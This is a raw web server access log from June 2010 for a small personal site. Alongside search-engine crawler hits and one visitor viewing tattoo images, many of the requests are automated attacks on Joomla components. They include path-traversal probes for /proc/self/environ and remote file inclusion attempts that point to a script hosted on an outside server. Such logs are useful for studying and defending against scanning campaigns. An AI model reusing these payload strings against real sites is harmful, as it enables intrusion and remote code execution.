207.191.228.114 - - [27/Jun/2010:19:54:13 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
207.191.228.114 - - [27/Jun/2010:19:54:13 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
207.191.228.114 - - [27/Jun/2010:19:54:13 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
207.191.228.114 - - [27/Jun/2010:19:54:13 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
207.191.228.114 - - [27/Jun/2010:19:54:13 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
207.191.228.114 - - [27/Jun/2010:19:54:13 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
207.191.228.114 - - [27/Jun/2010:19:54:13 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [27/Jun/2010:19:55:06 -0500] "GET /index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 294 "-""Casper Bot Search"
195.20.196.20 - - [27/Jun/2010:19:55:06 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 299 "-""Casper Bot Search"
195.20.196.20 - - [27/Jun/2010:19:55:06 -0500] "GET /logs/access_log.1276819200%20%20/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 323 "-""Casper Bot Search"
195.20.196.20 - - [27/Jun/2010:19:55:06 -0500] "GET /logs/access_log.1276732800%20%20/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 323 "-""Casper Bot Search"
87.250.252.241 - - [27/Jun/2010:19:55:59 -0500] "GET /logs/access_log.1269561600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
216.38.49.38 - - [27/Jun/2010:19:56:35 -0500] "GET /index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
216.38.49.38 - - [27/Jun/2010:19:56:36 -0500] "GET /index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
216.38.49.38 - - [27/Jun/2010:19:56:36 -0500] "GET /index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
216.38.49.38 - - [27/Jun/2010:19:56:36 -0500] "GET /index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
216.38.49.38 - - [27/Jun/2010:19:56:36 -0500] "GET /index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
216.38.49.38 - - [27/Jun/2010:19:56:37 -0500] "GET /index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
216.38.49.38 - - [27/Jun/2010:19:56:38 -0500] "GET /index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
91.198.130.7 - - [27/Jun/2010:19:58:00 -0500] "GET /index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 294 "-""Casper Bot Search"
91.198.130.7 - - [27/Jun/2010:19:58:00 -0500] "GET /logs/access_log.1274572800/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 321 "-""Casper Bot Search"
91.198.130.7 - - [27/Jun/2010:19:58:00 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 299 "-""Casper Bot Search"
91.198.130.7 - - [27/Jun/2010:19:59:51 -0500] "GET /logs/access_log.1276732800/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 321 "-""Casper Bot Search"
207.46.199.212 - - [27/Jun/2010:20:00:57 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.199.212 - - [27/Jun/2010:20:00:58 -0500] "GET /artwork/hennco3.JPG HTTP/1.1" 200 7267 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.199.212 - - [27/Jun/2010:20:00:58 -0500] "GET /artwork/hospitals.htm HTTP/1.1" 200 3315 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
69.90.47.83 - - [27/Jun/2010:20:01:52 -0500] "GET /logs/access_log.1276041600/?option=com_projectfork§ion=tasks&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
69.90.47.83 - - [27/Jun/2010:20:01:52 -0500] "GET /?option=com_projectfork§ion=tasks&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
69.90.47.83 - - [27/Jun/2010:20:01:52 -0500] "GET /logs/?option=com_projectfork§ion=tasks&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11233 "-""libwww-perl/5.805"
69.90.47.83 - - [27/Jun/2010:20:02:02 -0500] "GET /logs/access_log.1275782400/?option=com_projectfork§ion=tasks&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
216.38.49.38 - - [27/Jun/2010:20:02:23 -0500] "GET /logs/access_log.1274832000/index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
216.38.49.38 - - [27/Jun/2010:20:02:23 -0500] "GET /index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
216.38.49.38 - - [27/Jun/2010:20:02:23 -0500] "GET /logs/index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
216.38.49.38 - - [27/Jun/2010:20:02:28 -0500] "GET /logs/access_log.1274832000/index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
216.38.49.38 - - [27/Jun/2010:20:02:28 -0500] "GET /index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
216.38.49.38 - - [27/Jun/2010:20:02:29 -0500] "GET /logs/index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
208.80.193.35 - - [27/Jun/2010:20:02:30 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; CMS Music Store2 v1.00.13 (Music Store,1033); .NET CLR 1.1.4322; eMusic DLM/3; .NET CLR 2.0.50727)"
216.38.49.38 - - [27/Jun/2010:20:02:31 -0500] "GET /logs/access_log.1274832000/index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
216.38.49.38 - - [27/Jun/2010:20:02:31 -0500] "GET /index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
216.38.49.38 - - [27/Jun/2010:20:02:31 -0500] "GET /logs/access_log.1274832000/index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
216.38.49.38 - - [27/Jun/2010:20:02:31 -0500] "GET /logs/index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
216.38.49.38 - - [27/Jun/2010:20:02:31 -0500] "GET /index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
216.38.49.38 - - [27/Jun/2010:20:02:32 -0500] "GET /logs/index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
67.195.112.180 - - [27/Jun/2010:20:03:10 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
200.43.180.250 - - [27/Jun/2010:20:04:26 -0500] "GET /logs/access_log.1274572800//index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
200.43.180.250 - - [27/Jun/2010:20:04:29 -0500] "GET //index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
200.43.180.250 - - [27/Jun/2010:20:04:33 -0500] "GET /logs//index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
216.38.49.38 - - [27/Jun/2010:20:05:41 -0500] "GET /logs/access_log.1276041600/index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
216.38.49.38 - - [27/Jun/2010:20:05:55 -0500] "GET /logs/access_log.1276041600/index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
216.38.49.38 - - [27/Jun/2010:20:05:57 -0500] "GET /logs/access_log.1276041600/index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
81.31.149.80 - - [27/Jun/2010:20:06:02 -0500] "GET /.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 288 "-""libwww-perl/5.808"
216.38.49.38 - - [27/Jun/2010:20:06:06 -0500] "GET /logs/access_log.1276041600/index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
207.46.199.178 - - [27/Jun/2010:20:07:14 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.194.71 - - [27/Jun/2010:20:07:49 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.194.71 - - [27/Jun/2010:20:07:49 -0500] "GET /artwork/clinic8.JPG HTTP/1.1" 200 10212 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
208.115.111.248 - - [27/Jun/2010:20:09:09 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
91.198.130.7 - - [27/Jun/2010:20:10:03 -0500] "GET /?option=com_ninjarsssyndicator&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Casper Bot Search"
91.198.130.7 - - [27/Jun/2010:20:10:03 -0500] "GET /logs/?option=com_ninjarsssyndicator&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 200 11233 "-""Casper Bot Search"
91.198.130.7 - - [27/Jun/2010:20:10:03 -0500] "GET /logs/access_log.1276214400/?option=com_ninjarsssyndicator&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Casper Bot Search"
207.46.13.137 - - [27/Jun/2010:20:10:10 -0500] "GET /logs/access_log.1260748800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [27/Jun/2010:20:12:43 -0500] "GET /logs/access_log.1174780800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.142.216 - - [27/Jun/2010:20:12:55 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.118.96.160 - - [27/Jun/2010:20:13:56 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
207.7.108.242 - - [27/Jun/2010:20:14:10 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
78.110.50.134 - - [27/Jun/2010:20:14:13 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
87.118.96.160 - - [27/Jun/2010:20:15:40 -0500] "GET /logs/access_log.1274572800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
87.118.96.160 - - [27/Jun/2010:20:15:40 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
87.118.96.160 - - [27/Jun/2010:20:15:40 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
78.110.50.134 - - [27/Jun/2010:20:15:53 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
87.118.96.160 - - [27/Jun/2010:20:16:31 -0500] "GET /logs/access_log.1274572800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
87.118.96.160 - - [27/Jun/2010:20:16:32 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
87.118.96.160 - - [27/Jun/2010:20:16:32 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
87.118.96.160 - - [27/Jun/2010:20:16:39 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
87.118.96.160 - - [27/Jun/2010:20:16:53 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
67.195.112.180 - - [27/Jun/2010:20:17:04 -0500] "GET /logs/access_log.1274918400 HTTP/1.0" 200 921295 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
78.110.50.134 - - [27/Jun/2010:20:17:28 -0500] "GET /logs/access_log.1274572800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
78.110.50.134 - - [27/Jun/2010:20:17:29 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
78.110.50.134 - - [27/Jun/2010:20:17:29 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
78.110.50.134 - - [27/Jun/2010:20:17:54 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
78.110.50.134 - - [27/Jun/2010:20:17:55 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
207.7.108.242 - - [27/Jun/2010:20:18:01 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
78.110.50.134 - - [27/Jun/2010:20:18:55 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
207.7.108.242 - - [27/Jun/2010:20:20:18 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
87.118.96.160 - - [27/Jun/2010:20:20:56 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
99.188.49.167 - - [27/Jun/2010:20:21:33 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 (.NET CLR 3.5.30729)"
99.188.49.167 - - [27/Jun/2010:20:21:33 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 (.NET CLR 3.5.30729)"
99.188.49.167 - - [27/Jun/2010:20:21:33 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 (.NET CLR 3.5.30729)"
99.188.49.167 - - [27/Jun/2010:20:21:33 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 (.NET CLR 3.5.30729)"
99.188.49.167 - - [27/Jun/2010:20:21:33 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 (.NET CLR 3.5.30729)"
99.188.49.167 - - [27/Jun/2010:20:21:33 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 (.NET CLR 3.5.30729)"
99.188.49.167 - - [27/Jun/2010:20:21:33 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 (.NET CLR 3.5.30729)"
99.188.49.167 - - [27/Jun/2010:20:21:33 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 (.NET CLR 3.5.30729)"
99.188.49.167 - - [27/Jun/2010:20:21:33 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 (.NET CLR 3.5.30729)"
99.188.49.167 - - [27/Jun/2010:20:21:33 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 (.NET CLR 3.5.30729)"
99.188.49.167 - - [27/Jun/2010:20:21:33 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 (.NET CLR 3.5.30729)"
78.110.50.134 - - [27/Jun/2010:20:22:05 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
87.118.96.160 - - [27/Jun/2010:20:22:31 -0500] "GET /logs/access_log.1274572800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
81.20.136.40 - - [27/Jun/2010:20:22:31 -0500] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
87.118.96.160 - - [27/Jun/2010:20:22:31 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
87.118.96.160 - - [27/Jun/2010:20:22:31 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
207.7.108.242 - - [27/Jun/2010:20:22:32 -0500] "GET /logs/access_log.1274572800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
207.7.108.242 - - [27/Jun/2010:20:22:32 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
207.7.108.242 - - [27/Jun/2010:20:22:32 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
91.198.130.7 - - [27/Jun/2010:20:22:47 -0500] "GET /?option=com_ninjarsssyndicator&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Casper Bot Search"
91.198.130.7 - - [27/Jun/2010:20:22:47 -0500] "GET /logs/?option=com_ninjarsssyndicator&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 200 11233 "-""Casper Bot Search"
91.198.130.7 - - [27/Jun/2010:20:22:47 -0500] "GET /logs/access_log.1276732800/?option=com_ninjarsssyndicator&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Casper Bot Search"
216.38.49.38 - - [27/Jun/2010:20:23:07 -0500] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
216.38.49.38 - - [27/Jun/2010:20:23:15 -0500] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
216.38.49.38 - - [27/Jun/2010:20:23:20 -0500] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
78.110.50.134 - - [27/Jun/2010:20:23:29 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
78.110.50.134 - - [27/Jun/2010:20:23:29 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
78.110.50.134 - - [27/Jun/2010:20:23:29 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
91.198.130.7 - - [27/Jun/2010:20:24:19 -0500] "GET /?option=com_ninjarsssyndicator&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Casper Bot Search"
91.198.130.7 - - [27/Jun/2010:20:24:19 -0500] "GET /logs/access_log.1276732800%20%20/?option=com_ninjarsssyndicator&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 313 "-""Casper Bot Search"
91.198.130.7 - - [27/Jun/2010:20:24:19 -0500] "GET /logs/?option=com_ninjarsssyndicator&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 200 11233 "-""Casper Bot Search"
78.110.50.134 - - [27/Jun/2010:20:24:37 -0500] "GET /logs/access_log.1274572800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
78.110.50.134 - - [27/Jun/2010:20:24:38 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
78.110.50.134 - - [27/Jun/2010:20:24:38 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
78.110.50.134 - - [27/Jun/2010:20:24:50 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
207.7.108.242 - - [27/Jun/2010:20:25:28 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
87.118.96.160 - - [27/Jun/2010:20:25:33 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
78.110.50.134 - - [27/Jun/2010:20:26:02 -0500] "GET /logs/access_log.1274572800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
87.118.96.160 - - [27/Jun/2010:20:26:10 -0500] "GET /logs/access_log.1274054400//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
87.118.96.160 - - [27/Jun/2010:20:26:11 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
87.118.96.160 - - [27/Jun/2010:20:26:11 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
81.20.136.40 - - [27/Jun/2010:20:26:33 -0500] "GET /logs/access_log.1275696000/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.813"
81.20.136.40 - - [27/Jun/2010:20:26:33 -0500] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
81.20.136.40 - - [27/Jun/2010:20:26:33 -0500] "GET /logs/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.813"
81.20.136.40 - - [27/Jun/2010:20:26:39 -0500] "GET /logs/access_log.1275091200/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.813"
78.110.50.134 - - [27/Jun/2010:20:27:58 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
87.118.96.160 - - [27/Jun/2010:20:28:00 -0500] "GET /index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
78.110.50.134 - - [27/Jun/2010:20:28:03 -0500] "GET /index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
